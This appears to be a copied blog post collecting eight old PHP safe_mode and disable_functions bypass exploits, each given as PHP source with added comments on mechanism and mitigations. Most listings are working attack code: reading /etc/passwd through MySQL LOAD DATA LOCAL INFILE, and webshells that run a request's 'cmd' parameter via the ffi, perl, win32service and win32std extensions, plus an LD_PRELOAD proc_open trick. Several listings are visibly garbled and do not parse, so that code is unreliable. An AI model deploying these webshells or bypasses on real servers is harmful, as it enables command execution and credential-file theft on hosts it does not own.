  • PHP SAFE MODE BYPASS

    1- PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability

    <?php
    // Historical PHP <= 4.4.7 / 5.2.3 safe_mode bypass. safe_mode only wraps PHP's own
    // file functions (the file_get_contents() below is presumably the denied control);
    // the read that succeeds is performed by the MySQL client via LOAD DATA LOCAL INFILE,
    // which safe_mode never sees. Defender notes: safe_mode was removed in PHP 5.4 and was
    // never a real security boundary; the passwordless root login used here is the
    // enabling misconfiguration; disabling local_infile on the server and
    // mysql.allow_local_infile / mysqli.allow_local_infile in php.ini closes this path.
    // The mysql_* functions themselves were removed in PHP 7.0.
    file_get_contents('/etc/passwd'); 
    $l = mysql_connect("localhost", "root");
    mysql_query("CREATE DATABASE a");
    mysql_query("CREATE TABLE a.a (a varchar(1024))"); mysql_query("GRANT SELECT,INSERT ON a.a TO 'aaaa'@'localhost'"); mysql_close($l); 
    mysql_connect("localhost", "aaaa");
     mysql_query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $result = mysql_query("SELECT a FROM a.a"); 
    while(list($row) = mysql_fetch_row($result)) 
    print $row . chr(10); 
    
    ?>

    2- MySQL

    <?php
    // mysqli variant of the LOAD DATA LOCAL INFILE technique. The registered local-infile
    // handler is handed the client library's stream for the file and simply prints it;
    // $buf is never filled, so nothing is actually loaded into the table and no PHP file
    // function subject to safe_mode is called. Defender notes: MYSQLI_OPT_LOCAL_INFILE has
    // to be switched on explicitly here; keeping mysqli.allow_local_infile=0 (now the
    // default) and local_infile=0 on the server removes the primitive.
    // Callback signature required by set_local_infile_handler(): stream, &buffer, length, &error.
    function r($fp, &$buf, $len, &$err) { 
    print fread($fp, $len);
    } 
    $m = new mysqli('localhost', 'aaaa', '', 'a'); 
    $m->options(MYSQLI_OPT_LOCAL_INFILE, 1); 
    $m->set_local_infile_handler("r"); 
    $m->query("LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE a.a"); $m->close();
     
    ?>

    3- PHP FFI Extension Safe_mode Bypass Exploit

    <?php 
    // Command execution through the old PECL ffi extension: kernel32!WinExec is invoked
    // natively, so PHP-level safe_mode / disable_functions checks are never consulted.
    // The listing is garbled as copied and does not parse. Defender notes: any extension
    // that exposes raw native calls is equivalent to granting arbitrary code execution, so
    // the loaded-extension list must be whitelisted; the modern FFI extension (7.4+) is
    // gated by ffi.enable and should stay disabled for web workers; a request parameter
    // named cmd being passed to a process launcher is a high-signal webshell indicator.
    if(!extension_loaded('ffi')) 
    die('ERROR: FFI extension is not loaded!'); 
    $command=(empty($_GET['cmd']))?'dir':$_GET['cmd']; if(is_writeable(dirname(__FILE__)))
    $tmp=dirname(__  FILE__); elseif(is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path'); elseif(is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir'); 
    else die('ERROR: Move exploit to writeable folder.'); $output="$tmp\".uniqid('NJ'); 
    $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);"); $res=$api->WinExec("cmd.exe /c $command >"$output"",0); while(!file_exists($output))sleep(1); 
    $con=''; $fp=fopen($output,'r'); while(!feof($fp))$con.=fgets($fp,1024); fclose($fp); $con=htmlspecialchars($con); 
    echo "<pre>$con</pre>"; 
    unlink($output); 
    ?>

    4- PHP 5.2.4 ionCube extension safe_mode and disable_functions protections bypass

    <?php 
    // ionCube Loader ships its own file reader (ioncube_read_file), which does not go
    // through the safe_mode / open_basedir checks applied to readfile(). The readfile()
    // call is the expected-to-fail control; the ioncube_read_file() call is the bypass.
    // Defender note: third-party extensions that implement their own I/O sit outside every
    // PHP-level restriction, so such restrictions cannot be relied on for tenant isolation.
    // The listing is garbled as copied (including a stray ":)" line) and does not parse.
    if (!extension_loaded("ionCube Loader")) die("ionCube Loader extension required!");
    $path = str_repeat("..\", 20); 
    $MyBoot_readfile = readfile($path."windows\system.ini"); 
    #just to be sure that I set correctely disable_function 

    :)

     
    $MyBoot_ioncube = ioncube_read_file($path."boot.ini"); 
    echo $MyBoot_readfile; 
    echo "<br><br>ionCube output:<br><br>"; 
    echo $MyBoot_ioncube; 
    ?>

    5 – PHP Perl Extension Safe_mode Bypass

    <?php 
    // Command execution through the perl extension: the request parameter is interpolated
    // unescaped into a Perl system() call and run by the embedded interpreter, outside
    // PHP's safe_mode / disable_functions checks. Defender notes: an embedded-language
    // extension is an arbitrary-code-execution primitive and must not be loaded on a
    // shared or internet-facing host; the HTML form at the bottom is the typical webshell
    // UI and is easy to fingerprint in web logs and file scans.
    if(!extension_loaded('perl'))die('perl extension is not loaded'); if(!isset($_GET))$_GET=&$HTTP_GET_VARS; 
    if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls  '; 
    $perl=new perl(); 
    echo "<textarea rows='25' cols='75'>"; 
    $perl->eval("system('".$_GET['cmd']."')"); 
    echo "</textarea>"; 
    $_GET['cmd']=htmlspecialchars($_GET['cmd']); 
    echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>" 
    ?>

    6- PHP 5.x (win32service) Local Safe Mode Bypass Exploit

    <?php 
    // Command execution through the win32service extension: a throwaway Windows service
    // whose binary is cmd.exe is created, started, stopped and deleted, with the command's
    // output redirected into upload_tmp_dir and echoed back. Defender notes: this only
    // works if the PHP worker holds service-creation rights, which a web process should
    // never have; every run leaves a service-install record (System log event 7045) that is
    // a reliable detection for the pattern. The listing is garbled as copied.
    $command=(isset($_GET['CMD']))?$_GET['CMD']:'dir';
    #cammand 
    $dir=ini_get('upload_tmp_dir'); 
    #Directory to store command's output if(!extension_loaded('win32service'))die('win32ser  vice extension not found!'); 
    $name=$dir."\".uniqid('NJ'); 
    $n=uniqid('NJ'); 
    $cmd=(empty($_SERVER['ComSpec']))?'d:\windows\system32\cmd.exe':$_SERVER['ComSpec']; 
    win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >"$name"")); 
    win32_start_service($n); 
    win32_stop_service($n); 
    win32_delete_service($n); 
    $exec=file_get_contents($name); 
    unlink($name); 
    echo "<pre>".htmlspecialchars($exec)."</pre>"; 
    ?>

    7 – PHP 5.2.3 win32std extension safe_mode and disable_functions protections bypass

    <?php 
    // win32std extension: system() is the expected-to-fail control under disable_functions;
    // the extension's own process launcher is the bypass (in this copy it has been swallowed
    // into the comment on the following line, so as written only system() runs).
    // Defender note: disable_functions is a blocklist of PHP function names, not a sandbox;
    // any extension that can spawn processes has to be kept off the server entirely.
    if (!extension_loaded("win32std")) die("win32std extension required!"); system("cmd.exe"); 
    //just to be sure that protections work well win_shell_execute("..\..\..\..\windows\system32\cmd.exe"); 
    ?>

    8- PHP safe_mode Bypass via proc_open() and custom environment

    <?php
    // safe_mode / disable_functions bypass via proc_open(): the $env argument is passed to
    // the child unchanged, so an LD_PRELOAD pointing at a shared object under the web root
    // is honoured by the allowed child process. The shared object itself ($path."/a.so") is
    // not part of this listing, and the copy here is garbled and does not parse.
    // Defender notes: a writable web root combined with proc_open() should be treated as
    // code execution; isolate PHP with an unprivileged OS user and mandatory access control
    // rather than PHP-level flags, and alert on LD_PRELOAD appearing in process environments.
    $path="/var/www"; 
    //change to your writable path 
    $a=open($path."/.comm","w"); 
    fputs($a,$_GET["c"]); 
    fclose($a); 
    $descriptorspec = array(  0--> array("pipe", "r"),  1 =&gt; array("file", $path."/output.txt","w"),  2 =&gt; array("file", $path."/errors.txt", "a" ) );
    $cwd = '.'; 
    $env = array('LD_PRELOAD' =&gt; $path."/a.so"); 
    $process = proc_open('id &gt; /tmp/a', $descriptorspec, $pipes, $cwd, $env); 
    // example command - should not succeed sleep(1); $a=fopen($path."/.comm1","r"); 
    echo "<strong>"; 
    while (!feof($a)) {$b=fgets($a);echo $b;} fclose($a);
    ?>
  • 原文地址:https://www.cnblogs.com/jiancanxuepiao/p/4462630.html